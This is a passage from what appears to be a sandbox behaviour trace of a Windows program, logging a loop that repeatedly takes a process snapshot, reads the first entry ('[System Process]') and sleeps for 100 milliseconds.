pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.064] Sleep (dwMilliseconds=0x64) [0228.104] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0228.145] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.228] Sleep (dwMilliseconds=0x64) [0228.238] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0228.253] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.336] Sleep (dwMilliseconds=0x64) [0228.338] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0228.357] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.425] Sleep (dwMilliseconds=0x64) [0228.426] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0228.441] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.508] Sleep (dwMilliseconds=0x64) [0228.510] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0228.523] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.591] Sleep (dwMilliseconds=0x64) [0228.593] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0228.606] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.664] Sleep (dwMilliseconds=0x64) [0228.666] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0228.676] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.737] Sleep (dwMilliseconds=0x64) [0228.738] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0228.749] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.800] Sleep (dwMilliseconds=0x64) [0228.803] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0228.814] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.864] Sleep (dwMilliseconds=0x64) [0228.866] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0228.876] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.940] Sleep (dwMilliseconds=0x64) [0228.942] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0228.951] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.026] Sleep (dwMilliseconds=0x64) [0229.028] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0229.040] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.177] Sleep (dwMilliseconds=0x64) [0229.181] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0229.198] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.287] Sleep (dwMilliseconds=0x64) [0229.290] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0229.305] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.380] Sleep (dwMilliseconds=0x64) [0229.382] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0229.399] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.473] Sleep (dwMilliseconds=0x64) [0229.475] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0229.492] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.562] Sleep (dwMilliseconds=0x64) [0229.563] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0229.576] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.765] Sleep (dwMilliseconds=0x64) [0229.773] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0229.786] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.826] Sleep (dwMilliseconds=0x64) [0230.818] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0230.854] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.930] Sleep (dwMilliseconds=0x64) [0230.960] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0230.975] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.040] Sleep (dwMilliseconds=0x64) [0231.042] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0231.052] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.155] Sleep (dwMilliseconds=0x64) [0231.164] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0231.174] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.252] Sleep (dwMilliseconds=0x64) [0231.254] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0231.267] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.355] Sleep (dwMilliseconds=0x64) [0231.358] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0231.373] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.453] Sleep (dwMilliseconds=0x64) [0231.457] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0231.478] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.545] Sleep (dwMilliseconds=0x64) [0231.549] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0231.560] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.628] Sleep (dwMilliseconds=0x64) [0231.631] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0231.645] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.719] Sleep (dwMilliseconds=0x64) [0231.721] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0231.735] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.827] Sleep (dwMilliseconds=0x64) [0231.829] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0231.859] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.916] Sleep (dwMilliseconds=0x64) [0231.919] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0231.931] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.067] Sleep (dwMilliseconds=0x64) [0232.079] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0232.142] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.242] Sleep (dwMilliseconds=0x64) [0232.245] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0232.266] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.327] Sleep (dwMilliseconds=0x64) [0232.330] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0232.341] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.405] Sleep (dwMilliseconds=0x64) [0232.407] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0232.419] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.482] Sleep (dwMilliseconds=0x64) [0232.484] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0232.498] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.559] Sleep (dwMilliseconds=0x64) [0232.561] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0232.572] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.631] Sleep (dwMilliseconds=0x64) [0232.634] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0232.645] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.710] Sleep (dwMilliseconds=0x64) [0232.712] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0232.725] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.787] Sleep (dwMilliseconds=0x64) [0232.790] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0232.800] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.861] Sleep (dwMilliseconds=0x64) [0232.864] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0232.881] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.950] Sleep (dwMilliseconds=0x64) [0232.952] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0232.968] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.029] Sleep (dwMilliseconds=0x64) [0233.031] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0233.049] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.193] Sleep (dwMilliseconds=0x64) [0233.195] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0233.213] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.287] Sleep (dwMilliseconds=0x64) [0233.289] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0233.327] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.398] Sleep (dwMilliseconds=0x64) [0233.402] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0233.416] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.479] Sleep (dwMilliseconds=0x64) [0233.483] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0233.500] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.569] Sleep (dwMilliseconds=0x64) [0233.570] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2428 [0233.586] Process32First (in: hSnapshot=0x2428, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.649] Sleep (dwMilliseconds=0x64) [0233.666] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0233.692] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.776] Sleep (dwMilliseconds=0x64) [0233.784] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0233.798] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.877] Sleep (dwMilliseconds=0x64) [0233.879] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0233.888] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.951] Sleep (dwMilliseconds=0x64) [0233.953] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0233.963] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.033] Sleep (dwMilliseconds=0x64) [0234.034] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0234.048] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.158] Sleep (dwMilliseconds=0x64) [0234.160] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0234.173] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.245] Sleep (dwMilliseconds=0x64) [0234.247] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0234.263] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.324] Sleep (dwMilliseconds=0x64) [0234.327] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0234.340] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.438] Sleep (dwMilliseconds=0x64) [0234.439] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0234.451] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.514] Sleep (dwMilliseconds=0x64) [0234.516] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0234.527] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.597] Sleep (dwMilliseconds=0x64) [0234.599] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0234.615] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.699] Sleep (dwMilliseconds=0x64) [0234.701] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0234.719] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.795] Sleep (dwMilliseconds=0x64) [0234.797] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f0 [0234.811] Process32First (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: 